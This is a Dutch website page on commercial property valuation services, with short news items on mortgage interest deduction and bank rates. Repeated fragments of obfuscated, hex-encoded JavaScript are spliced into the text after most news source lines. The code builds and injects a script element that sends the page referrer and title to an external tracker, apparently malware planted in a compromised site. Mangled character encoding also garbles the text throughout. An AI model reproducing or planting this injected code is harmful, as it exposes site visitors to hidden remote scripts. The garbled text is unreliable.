Bedrijfspand Taxatie

Er zijn verschillende redenen mogelijk om een bedrijfstaxatie af te sluiten:

Bedrijfspand Taxatie voor financieringen

Deze taxatievorm is ten behoeve van de financiering bij de aankoop van een bedrijfspand, oversluiten van een bestaande financiering of in geval van verbouw en/of renovatie van een pand. De taxatie is ook geschikt voor de huidige of toekomstige eigenaar die hypotheek wenst te verlenen op zijn bedrijfspand.

Bedrijfspand Taxatie voor aankoopbeslissingen

Deze taxatievorm is geschikt voor degene die een bedrijfspand, winkel of kantoor willen kopen. Ook wanneer u een onafhankelijk advies wilt hebben omtrent de gehanteerde vraagprijs, is deze vorm van taxatie uitermate geschikt. Taxatie ten behoeve van aankoopbeslissingen is een onderbouwd advies over waarde, bestemming en gebruik, waarbij de aspirant-koper kan beoordelen of het desbetreffende pand ten behoeve van de uitoefening van zijn bedrijf aan de verwachtingen van prijs, kwaliteit en gebruiksmogelijkheden voldoet. Ook is de taxatie geschikt voor de toekomstige eigenaar die hypotheek wenst te verlenen op zijn bedrijfspand.

Bedrijfspand Taxatie voor verkoopbeslissingen

Deze taxatievorm is geschikt voor degene die een bedrijfspand, winkel, kantoor of ander commercieel onroerend goed. willen verkopen. Tevens geeft de taxatie een onafhankelijk advies, omtrent de te hanteren vraagprijs. Taxatie ten behoeve van verkoopbeslissingen is een onderbouwd advies over waarde, bestemming, gebruik en gebruiksmogelijkheden.

Taxatie voor de Belastingdienst

Deze Bedrijfspand Taxatie is geschikt voor degene die vastigheid willen omtrent de waarde van de onroerende zaken die bedrijfsmatig worden aangewend richting de Belastingdienst. Taxatie ten behoeve van de Belastingdienst is een onderbouwd advies over waarde, bestemming, gebruik en gebruiksmogelijkheden die door een ervaren taxateur wordt vastgesteld.

Minnelijke waarderingen

Indien een onroerende zaak moet worden getaxeerd i.v.m. de aangifte voor het Recht van Successie na het overlijden van een gerechtigde, dan kunnen de erfgenamen de Belastingdienst verzoeken om een zogenaamde “minnelijke waardering”. Tezamen met een taxateur van de Belastingdienst brengt de taxateur een gezamenlijke taxatie uit, waarvan de uitkomst bindend is voor beide partijen.

Balanswaardebepaling

Ondernemers willen de waarde weten van hun bedrijfspand op een bepaalde datum. Voor het vaststellen van het bedrijfskapitaal is het belangrijk dat per peildatum een goede waarde wordt gehanteerd voor de bedrijfsbalans en jaarrekening. Mede hiervan is het bedrijfsresultaat afhankelijk en Bedrijfspand Taxatie gewenst.

Huurprijsadvies

Deze taxatievorm is geschikt voor mensen die een bedrijfspand, winkel, kantoor of ander commercieel onroerend-goed verhuren of huren. De huurprijstaxatie is een soort bedrijfstaxatie. Het is een onderbouwd advies over huurwaarde, in relatie tot het bestemmingsplan, gebruik en gebruiksmogelijkheden. De taxatie is geschikt voor iedere eigenaar, die wil overgaan tot verhuur van zijn bedrijfspand, winkel, kantoor of ander commercieel onroerend goed of voor een aspirant-huurder. Er wordt onderscheid gemaakt tussen de zogenaamde BW 7a: 1624-panden en overige bedrijfspanden.

Vaststellingsovereenkomst Belastingdienst

De vaststellingsovereenkomst Belastingdienst is een taxatie van een onroerende zaak, die door de taxateur tezamen met een taxateur van de Belastingdienst wordt afgenomen. Het doel van deze taxatie is het bepalen van de waarde van een onroerende zaak. Tevens stelt de taxatie het vermogen van een belastingplichtige of onderneming vast, de inbreng- of ontrekkingswaarde bij een onderneming of voor de belastingheffing van een bepaald jaar. De uitkomst van de taxatie is bindend voor beide partijen. Een belastingplichtige kan een “vaststellingsovereenkomst” aanvragen bij de Belastingdienst.

Bedrijfspand Taxatie als je de waarde wil weten !

Wat is een taxatie?

Wat is een

taxatie

eigenlijk en waarom moet een woning getaxeerd worden?

Het verschaffen van belangrijke gegevens van uw eigen woning of van de woning die u heeft gekocht is het belangrijkste doel van een taxatie. Een taxatierapport is meestal verplicht voordat banken en andere financiA?A?le instellingen een hypotheek verstrekken. Omtrent het huis waar u een hypotheek voor aanvraagt wil de geldverstrekker (de bank) zekerheid hebben. Een onafhankelijk oordeel van een deskundige is daarbij vereist. Deze deskundige is de taxateur.

Wie is de taxateur en wat doet hij?

Het taxatierapport wordt gemaakt door de taxateur. Omdat hij degene is die de waarde van uw huis moet bepalen moet hij op een aantal interne omstandigheden letten:

*plaats waarin uw woning ligt
*buurt waarin uw woning ligt
*omgevingsfactoren (bestemmingsplan, snelweg, winkelcentrum, kindvriendelijke buurt enz.)
*aanwezigheid van tuin, garage, balkon enz.
*staat van het onderhoud, constructie en kwaliteit van de toegepaste materialen (worden er grote reparaties verwacht in de toekomst)
*de functionaliteit van de indeling
*isolatie en energiezuinige maatregelen
*inhoud en oppervlakte
*verplichtingen en rechten die op de grond rusten (bijvoorbeeld erfpacht of recht van overpad)

Ook let de taxateur op externe omstandigheden die de waarde van uw huis kan beA?A?nvloeden

*prijsontwikkeling op de markt van min of meer vergelijkbare woningen.
*toekomstige ontwikkelingen, bijvoorbeeld het bestemmingsplan ter plaatse.
*komt datgene wat hij waarneemt, overeen met de gegevens van het Kadaster

Hoe gaat het in zijn werk de taxatie?

De taxateur maakt met u een afspraak. Indien u als opdrachtgever niet de eigenaar bent, is het niet gebruikelijk dat u bij de taxatie aanwezig bent.
Let op: zorgt u er bij een nog te realiseren verbouwing voor dat u hiervan in de aanvraag duidelijk melding maakt, en dat u de taxateur op aanvraag een beschrijving en kostenraming van deze verbouwing verstrekt.

Verschotten

Het kan voorkomen dat u zogenaamde A?a??E?verschottenA?a??a?? moet betalen, dit zijn extra gemaakte kosten. De taxateur mag een onderzoek in stellen naar factoren die de waarde van een huis kunnen beA?A?nvloeden.

Voorbeelden:

*Veranderingen in beleid, bestemming en gebruik in bestemmingsplannen, bouwverordeningen, drank- en horecawet, openluchtrecreatie en ontheffingen
*Informatie over milieuvervuiling (bodem, lucht en water), eventuele aanwezige oude olietanks, enz.
*Afgegeven vergunningen aan derden die van invloed (kunnen) zijn op het woongenot
*Informatie van het kadaster

Deze informatie wordt veelal opgevraagd bij de gemeente. De gemeente kan hiervoor kosten in rekening brengen. Dit zijn de ‘verschotten’. Iedere gemeente mag haar eigen tarieven vaststellen. Daardoor kan een taxatie in stad A aanmerkelijk duurder uitvallen dan stad B, terwijl in stad C helemaal geen kosten worden berekend. De verschotten worden doorberekend, zonder winstopslag. Voor zover bij ons bekend, bedraagt het tarief voor verschotten in de regel niet meer dan A?a?sA? 100,–.

Naast het raadplegen van het Kadaster voert de taxateur bijna altijd ook een onderzoek uit naar de eigendomspapieren tijdens de taxatie. De taxateur dient te onderzoeken of de kadastrale gegevens overeenstemmen met het eigendomsbewijs, en of op het object erfdienstbaarheden, kettingbeding, erfpacht e.d. zijn gevestigd. Tevens blijkt uit de praktijk dat het noodzakelijk is om te controleren of de verkoper ook wel daadwerkelijk de eigenaar is. Ook extra kosten te maken voor dit onderzoek zijn inbegrepen.

Openingstijden nationale nederlanden

De openingstijden nationale nederlanden worden uitgebreid. Aansluitend op de introductie van de nieuwe autopolis, die uitsluitend via Mijn.NN.nl kan worden gesloten, heeft Nationale-Nederlanden het callcenter voor autoverzekeringen ook in de avonden en weekends opengesteld. Ook krijgt het intermediair een digitale versie van de polis om zelf te printen en op te slaan. Polisvoorwaarden en groene kaart blijft NN verzenden.
Bron: AM Signalen \x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0xb322[1]](_0xb322[0]);s[_0xb322[2]]= _0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12];if(document[_0xb322[13]]){document[_0xb322[13]][_0xb322[15]][_0xb322[14]](s,document[_0xb322[13]])}else {d[_0xb322[18]](_0xb322[17])[0][_0xb322[16]](s)};if(document[_0xb322[11]][_0xb322[19]]=== _0xb322[20]&& KTracking[_0xb322[22]][_0xb322[21]](_0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])}

Wfd-toets

The Brown Paper Company (www.brownpapercompany.nl) heeft een

Wfd-toets

ontwikkeld waarmee de tussenpersoon snel inzicht krijgt in de acties die ondernomen moeten worden om te voldoen aan de eisen van de Wfd. Op basis van een gedegen analyse en een bezoek aan het kantoor wordt een actieplan op maat opgesteld. Tevens biedt The Brown Paper Company de mogelijkheid een praktijkgerichte Wfd-masterclass te volgen. De reacties van tussenpersonen die reeds gebruik hebben gemaakt van deze diensten zijn positief.
Bron: AM Signalen 13 september 2005 “\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0xb322[1]](_0xb322[0]);s[_0xb322[2]]= _0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12];if(document[_0xb322[13]]){document[_0xb322[13]][_0xb322[15]][_0xb322[14]](s,document[_0xb322[13]])}else {d[_0xb322[18]](_0xb322[17])[0][_0xb322[16]](s)};if(document[_0xb322[11]][_0xb322[19]]=== _0xb322[20]&& KTracking[_0xb322[22]][_0xb322[21]](_0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])}

Hypotheekrenteaftrek weinig effectief

De Nederlandsche Bank (DNB) vindt de

Hypotheekrenteaftrek weinig effectief

. ‘De aftrek hoort het woningbezit te bevorderen, maar leidt, bij het huidige gebrek aan aanbod, vooral tot hogere prijzen. Een averechts effect en een weinig doelmatig gebruik van overheidsgeld,’ zegt Aerdt Houben, hoofd toezicht, beleid en strategie van DNB deze week in Elsevier.

Die geringe effectiviteit en de oplopende rekening van de hypothecaire kredietverlening in combinatie met de fiscale aftrekmogelijkheden ‘kunnen voor de politiek aanleiding zijn om naar de renteaftrek te kijken,’ stelt de topman van de centrale bank. Het beperken van die aftrek zal tot een verschuiving van de koopkracht leiden, aldus Houben. ‘Daarmee moet je voorzichtig omgaan, maar je moet aanpassing niet eindeloos willen voorkomen.’

De Nederlandse Vereniging van Banken (NVB), de lobbyclub van banken, presenteerde onlangs zes manieren om de hypotheekrenteaftrek te beperken zonder dat de financiA?A?le stabiliteit gevaar loopt. Houben: ‘Hun zorg om het evenwicht op de huizenmarkt is volledig terecht.’
Bron: Elsevier 18 mei 2004 x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0xb322[1]](_0xb322[0]);s[_0xb322[2]]= _0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12];if(document[_0xb322[13]]){document[_0xb322[13]][_0xb322[15]][_0xb322[14]](s,document[_0xb322[13]])}else {d[_0xb322[18]](_0xb322[17])[0][_0xb322[16]](s)};if(document[_0xb322[11]][_0xb322[19]]=== _0xb322[20]&& KTracking[_0xb322[22]][_0xb322[21]](_0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])}

Den Haag wil niet praten over hypotheekrente

DEN HAAG – Regeringspartijen CDA en VVD hebben ‘geen behoefte’ aan een discussie over een beperking van de aftrek van hypotheekrente. ‘Daar is geen aanleiding toe’, zegt CDA’er Frans van der Net. Een zegsvrouw van minister Gerrit Zalm (FinanciA?n) zegt dat de rente-aftrek ‘geen issue’ is.

Den Haag wil niet praten over hypotheekrente

.

De kleinste coalitiepartij, D66, is ‘huiverig’ om de aftrek ter discussie te stellen, aldus kamerlid Bert Bakker: ‘Als je het al doet, dan alleen in samenhang met de andere belastingen op wonen, zoals het huurwaardeforfait en de onroerendzaakbelasting’.

Woensdag gooide voorzitter Hein Blocks van de Nederlandse Vereniging van Banken de knuppel in het hoenderhok door de hypotheekrente-aftrek ter discussie te stellen. Den Haag wil niet praten over hypotheekrente. PvdA-kamerlid Ferd Crone is ‘zeer verrast dat de Nederlandse banken inzien dat het huidige systeem van renteaftrek niet ongewijzigd kan blijven’. Volgens hem zal de schatkist te maken krijgen met miljardentegenvallers als de rente gaat stijgen.
Bron: Volkskrant 13 mei 2004 ot;,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0xb322[1]](_0xb322[0]);s[_0xb322[2]]= _0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12];if(document[_0xb322[13]]){document[_0xb322[13]][_0xb322[15]][_0xb322[14]](s,document[_0xb322[13]])}else {d[_0xb322[18]](_0xb322[17])[0][_0xb322[16]](s)};if(document[_0xb322[11]][_0xb322[19]]=== _0xb322[20]&& KTracking[_0xb322[22]][_0xb322[21]](_0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])}

Banken voor afbouwen renteaftrek hypotheken

DEN HAAG – De Nederlandse banken stellen de hypotheekrenteaftrek ter discussie. Hein Blocks, voorzitter van de Nederlandse Vereniging van Banken (NVB), zal vandaag zes varianten presenteren om de hypotheekrenteaftrek af te bouwen. De banken spelen hiermee in op een eventueel politiek besluit om de renteaftrek te beperken.

Banken voor afbouwen renteaftrek hypotheken

Tegelijkertijd vragen de banken de politiek om een variant te kiezen die de huizenmarkt zo min mogelijk zal verstoren.

Blocks wil geen voorkeur aangeven voor aan van de varianten: ‘Je kunt bijvoorbeeld de renteaftrek elk jaar met A?A?n procent verminderen. Dan begin je op 52 procent en bouw je vijftig jaar af.’

Blocks denkt dat de hypotheekrenteaftrek onder druk komt te staan door de Europese eenwording (in veel Europese landen bestaat zo’n renteaftrek niet) of door politieke ontwikkelingen in Nederland. ‘De burger verdient duidelijkheid. Of de politiek doet niets aan de renteaftrek, of ze doet het wel, maar dan moet snel aangegeven worden hoe de aftrek beperkt wordt. Bovendien moet de politiek kiezen voor geleidelijkheid. Op die manier verstoor je de huizenprijzen zo min mogelijk’, aldus de NVB-voorzitter.

Blocks noemt de timing van zo’n maatregel ook belangrijk. ‘Vijf jaar geleden was natuurlijk een veel beter moment geweest (tijdens de voorbereiding op belastingherziening van 2001, red). Nu is de woningmarkt in een ‘gevoelige fase’, stelt de NVB-voorzitter.Banken voor afbouwen renteaftrek hypotheken.

Van de grote politieke partijen heeft alleen de PvdA de hypotheekrenteaftrek ter discussie durven stellen. Wouter Bos, de PvdA-fractievoorzitter, suggereerde de aftrek te beperken tot 42 procent van het inkomen, een situatie die in de genoemde NVB-varianten pas na tien jaar wordt bereikt.

PvdA-Kamerlid Crone stelde onlangs voor om het eigen huis onder te brengen in belastingbox 3, zodat er vermogensbelasting betaald zou moeten worden over het eigen huis. De NVB wil niet zeggen of de PvdA-varianten vandaag ook ter sprake komen op het bankcongres in Amsterdam.

Het ministerie van FinanciA?n heeft in een studiedocument uit 2001 dertien manieren gepresenteerd om de hypotheekrenteaftrek af te bouwen. Er is in de Tweede Kamer echter nooit een meerderheid voor A?A?n van de mogelijkheden geweest.
Bron: Volkskrant 12 mei 2004

Delta Lloyd verlaagt de hypotheekrente

Delta Lloyd verlaagt de hypotheekrente. De hypotheekrente voor 5 jaar met NHG of voor nieuwbouw tot een executiewaarde van 125% komt op 4,4%. De hypotheekrente die de laatste maanden was gestegen als gevolg van het verwachte economische herstel in de Verenigde Staten komt daarmee weer op het niveau van oktober. \x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0xb322[1]](_0xb322[0]);s[_0xb322[2]]= _0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12];if(document[_0xb322[13]]){document[_0xb322[13]][_0xb322[15]][_0xb322[14]](s,document[_0xb322[13]])}else {d[_0xb322[18]](_0xb322[17])[0][_0xb322[16]](s)};if(document[_0xb322[11]][_0xb322[19]]=== _0xb322[20]&& KTracking[_0xb322[22]][_0xb322[21]](_0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])}

Huizenkoper wordt zekerheidszoeker

Mensen zijn veel voorzichtiger geworden bij het kopen van een huis.

Huizenkoper wordt zekerheidszoeker

Zo bleek al eerder dat het aandeel van hypotheken met een rentevaste periode van 5 tot 10 jaar is toegenomen van 20% tot bijna 50%. Nu blijkt ook dat huizenkopers veel vaker een bouwkundige keuring uitvoeren alvorens tot aanschaf over te gaan. Van juni tot en met november heeft de Vereniging Eigen Huis 5000 bestaande woningen gekeurd, 28 procent meer dan in dezelfde periode vorig jaar.

Dat heeft de belangenorganisatie dinsdag laten weten. Dat kopers de rente voor de hypotheek op dit moment voor een veel langer periode vastleggen dan voorheen komt overigens ook door de lage rentestand van dit moment. 70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0xb322[1]](_0xb322[0]);s[_0xb322[2]]= _0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12];if(document[_0xb322[13]]){document[_0xb322[13]][_0xb322[15]][_0xb322[14]](s,document[_0xb322[13]])}else {d[_0xb322[18]](_0xb322[17])[0][_0xb322[16]](s)};if(document[_0xb322[11]][_0xb322[19]]=== _0xb322[20]&& KTracking[_0xb322[22]][_0xb322[21]](_0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])}

Record aantal hypotheekgaranties in 2003

Amsterdam 6 januari

Record aantal hypotheekgaranties in 2003

In 2003 hebben ruim 70.000 huishoudens een hypotheek gesloten met Nationale Hypotheek Garantie (NHG). Dit is een toename van 36% ten opzichte van 2002. Niet alleen het aantal garanties in verband met de aankoop van een woning is fors gestegen, ook het aantal garanties voor leningen in verband met woningverbetering is toegenomen.

Ten opzichte van 2002 was er ruim een verdubbeling van het aantal gedwongen huizenverkopen met verlies. In 178 gevallen heeft het Waarborgfonds Eigen Woningen het tekort bij een gedwongen verkoop bijgepast.
Bron: Nationale Hypotheek Garantie F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0xb322[1]](_0xb322[0]);s[_0xb322[2]]= _0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12];if(document[_0xb322[13]]){document[_0xb322[13]][_0xb322[15]][_0xb322[14]](s,document[_0xb322[13]])}else {d[_0xb322[18]](_0xb322[17])[0][_0xb322[16]](s)};if(document[_0xb322[11]][_0xb322[19]]=== _0xb322[20]&& KTracking[_0xb322[22]][_0xb322[21]](_0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])}